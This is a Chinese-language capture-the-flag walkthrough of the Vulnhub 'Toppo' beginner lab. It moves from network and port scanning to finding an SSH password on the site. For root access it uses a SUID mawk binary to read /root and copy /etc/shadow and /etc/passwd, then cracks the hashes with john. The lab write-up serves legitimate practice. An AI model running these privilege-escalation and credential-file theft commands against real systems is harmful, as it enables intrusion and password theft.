这是一次靶场练习,使用 kali 和 Vulnhub 的Toppo靶机 ,难度属于新手入门 !
靶机下载地址:
1、https://download.vulnhub.com/toppo/Toppo.zip
2、https://download.vulnhub.com/toppo/Toppo.zip.torrent
知识点:
1、netdiscover发现局域网内靶机IP地址
2、nmap扫描端口、服务、漏洞
3、dirb路径扫描
4、根据发现的端口(服务),尝试相应的探测和攻击
5、cewl搜集页面关键词做成密码字典
6、john密码爆破
7、Linux提权
0x01 信息收集
sudo netdiscover -r 192.168.5.101/24
#发现接入网络内的靶机,用 nmap -A 192.168.5.101/24 也可以获取靶机的地址
sudo arp-scan -l
# arp-scan 也可以用于发现内网IP
# 192.168.5.103 是靶机IP
sudo nmap -sV -Pn -A -O 192.168.5.103
#收集端口信息,看看目标开放了那些业务,目标开放了 22、80、111 端口
0x02 弱点探测
先从先前发现的 22、80、111 三个端口入手
22端口:ssh 192.168.5103
#尝试直接连接ssh,一般是不行的,这里果然不行
80端口:直接浏览器访问 http://192.168.5.103
22 端口和 80 端口暂时没有获得什么有效的信息!
dirb http://192.168.5.103
# 尝试扫描web目录,发现了很多路径
# 我在 http://192.168.5.103/admin/ 这个路径下发现了惊喜
靶机的账号密码可能是:12345ted123
0x03 渗透攻击
1、尝试ssh,因为我没有发现web登录页面,用 12345ted123 里面的字符组合得到账号:ted 密码:12345ted123
2、账号可能是web页面里面的一些关键字,可以将这些单词做成一个字典,对账号进行爆破使用cewl爬取网页里面的关键词做成密码字典进行爆破
0x04 权限提升
find / -perm -u=s -type f 2>/dev/null
#进入内部后,最好被动的收集信息,尽量不要使用工具以达到提权
发现 python2.7 和 mawk 有执行权限!
/usr/bin/mawk 'BEGIN{system("whoami")}'
/usr/bin/mawk 'BEGIN{system("ls /root")}' //直接发现flag
/usr/bin/mawk 'BEGIN{system("cp /root/flag.txt ./")}'
/usr/bin/mawk 'BEGIN{system("cp /etc/shadow ./")}'
/usr/bin/mawk 'BEGIN{system("cp /etc/passwd ./")}'
scp ted@192.168.5.103:/home/ted/passwd ./
scp ted@192.168.5.103:/home/ted/shadow ./ #将 passwd 和 shadow 文件拷贝到kali上进行破解
sudo john shadow
#用john爆破一下shadow
提权成功!